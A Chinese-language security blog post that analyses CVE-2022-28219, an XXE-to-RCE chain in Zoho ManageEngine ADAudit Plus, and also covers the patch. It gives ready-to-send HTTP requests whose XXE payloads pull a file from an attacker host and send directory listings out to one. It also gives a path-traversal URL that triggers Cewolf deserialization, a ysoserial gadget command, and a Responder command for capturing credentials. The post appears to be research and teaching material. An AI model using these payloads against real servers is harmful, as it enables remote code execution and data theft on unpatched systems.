CVE-2022-28219 Zoho ManageEngine ADAudit Plus XXE到RCE

警告
本文最后更新于 2022-06-30,文中内容可能已过时。

太累了,老外三天发俩洞,学不过来了。

# 环境搭建

https://archives2.manageengine.com/active-directory-audit/7055/ManageEngine_ADAudit_Plus_x64.exe

需要搭建一个域环境,直接把安装adaudit的机器提升为域控就行。

# 分析

这个洞用了两个点串起来成了一个rce,分别是xxe和一个readObject的点。

readObject是steventseeley挖掘的Cewolf反序列化,ADAudit仍然有这个servlet,并且init参数为FileStorage。

image.png

de.laures.cewolf.storage.FileStorage#getChartImage 这个地方存在readObject

image.png

详细的不讲了,看steventseeley在 https://srcincite.io/advisories/src-2020-0011/ 中提到的poc就懂了。

这个利用点需要在目标机器上上传一个序列化的payload,然后通过../跨目录触发。在下面的xxe中会串起来利用。

xxe来自比较常规的DocumentBuilderFactory类

在com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#parseTaskContent中

image.png

来自于eventTbl参数的Task Content或者Task New Content键值会造成xxe。

然后找路由触发点。

先来看web.xml

image.png

/api/agent对应com.adventnet.sym.adsm.auditing.webclient.ember.api.ADAPAgentAPIServlet#processRequest

image.png

跟如com.adventnet.sym.adsm.auditing.webclient.ember.api.RestAPIHandler#executeAgentRequest

image.png

通过正则匹配拿到对应的handler为com.adventnet.sym.adsm.auditing.webclient.ember.api.agent.AgentDataHandler#receiveData

image.png

在receiveData中通过读body取json,body取不到就从header中拿json,然后转成一个json数组jsonEventArray。接着如果是有效的json

image.png

交由com.adventnet.sym.adsm.auditing.server.EventDataAdapter#notify消息队列处理。

image.png

notify只负责向eventQueue中加事件,真正处理队列消息的地方在其子类com.adventnet.sym.adsm.auditing.server.EventDataAdapter.EventDispatcher#run

image.png

在这里需要关注一点,如果原始data中DomainName等于null,那么DomainDnsName也会等于null。

image.png

这个地方是个大坑,如果没有给对正确的域环境的域名,那么在下一步就不会触发漏洞,接着看。

通过重组modData,最终交由com.adventnet.sym.adsm.auditing.server.ProcessMonitor#process处理。

image.png

process函数会获取domainName对应的键值来迭代,最终调用addEventRows,如果你的传参DomainName为空,那么这个地方进入不了迭代循环,就触发不了漏洞。

跟进addEventRows

image.png

addEventRows会根据传入的CategoryId参数来获取不同的Listener,然后分发进入getEventRowList函数。

其中listener有很多,id为11的时候刚好是ProcessTrackingListener

image.png

接着走进com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#getEventRow

image.png

parseTaskContent到xxe的点

image.png

有了xxe之后,需要了解一个jdk的老版本xxe trick。

这是2013年的议题

https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf

在这个议题中提到,通过xxe我们可以上传文件和列举目录,jdk8u131之后的修复commit在这里

可以使用这个ftp服务器来使文件驻留到目标服务器中。

https://github.com/pwntester/BlockingServer/blob/master/BlockingServer.java

监听

image.png

发请求包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
POST /api/agent/tabs/agentData HTTP/1.1
Host: 172.16.16.132:8081
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 316
Content-Type: application/json

[
    {
        "DomainName": "test.local",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY ssrf SYSTEM \"jar:http://172.16.16.1:2122/upload.jar!/file.txt\"> ]><foo>&ssrf;</foo>"
    }
]

此时文件被驻留在用户的临时目录下,我的用户是administrator,所以在C:/Users/Administrator/AppData/Local/Temp/目录下

接着用这个项目来列目录,监听之后发请求包

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
POST /api/agent/tabs/agentData HTTP/1.1
Host: 172.16.16.132:8081
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 393
Content-Type: application/json

[
    {
        "DomainName": "test.local",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [  <!ENTITY % file SYSTEM \"file:///C:/Users/Administrator/AppData/Local/Temp/\">  <!ENTITY % dtd SYSTEM \"http://192.168.1.207:9090/data.dtd\"> %dtd;]><data>&send;</data>"
    }
]

image.png

我们的url.txt就被传到了jar_cache9091707163659467742.tmp这个文件。这个时候ftp服务端不要关,不然文件就被删除了。

接下来就是触发反序列化的

1
http://172.16.16.132:8081/cewolf/a.png?img=/../../../../../../../../../Users/Administrator/AppData/Local/Temp/jar_cache9091707163659467742.tmp

gadget可以用cb192

1
java -jar .\ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"

最后就是国际惯例

image.png

# 一些问题

  1. 如何获取DomainName
  2. c:/Users/Administrator/AppData/Local/Temp/jar_cache9091707163659467742.tmp 中administrator怎么判断?

第一个问题登录的时候可以获取到一部分的域名

image.png

/api/agent/configuration/getAgentServerInfo 接口中,如果配置了agent之后会有完整的fqdn

image.png

第二个问题可以用笨方法先列举C:\Users\所有用户,然后列举用户的temp目录,有的不是在用户的temp,而是在c:/windows/temp下,或者直接Responder抓到当前用户名

1
sudo python3 Responder.py -I ens160

image.png

# 修复

注释了CewolfServlet

image.png

修了xxe

image.png

加了guid校验

image.png

# 路径发现

尝试用自己改过的tabby来查一下看数据流走向,然后发现数据流在队列的情况中调用边断掉了。

上文中我们讲到com.adventnet.sym.adsm.auditing.webclient.ember.api.agent.AgentDataHandler#receiveData将接受到的数据放入com.adventnet.sym.adsm.auditing.server.EventDataAdapter.EventQueue队列,然后分派一个线程com.adventnet.sym.adsm.auditing.server.EventDataAdapter.EventDispatcher#run做循环处理。

那么在call graph中,两部分调用边被截断了。所以这里应该从run开始做调用边查询

image.png

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。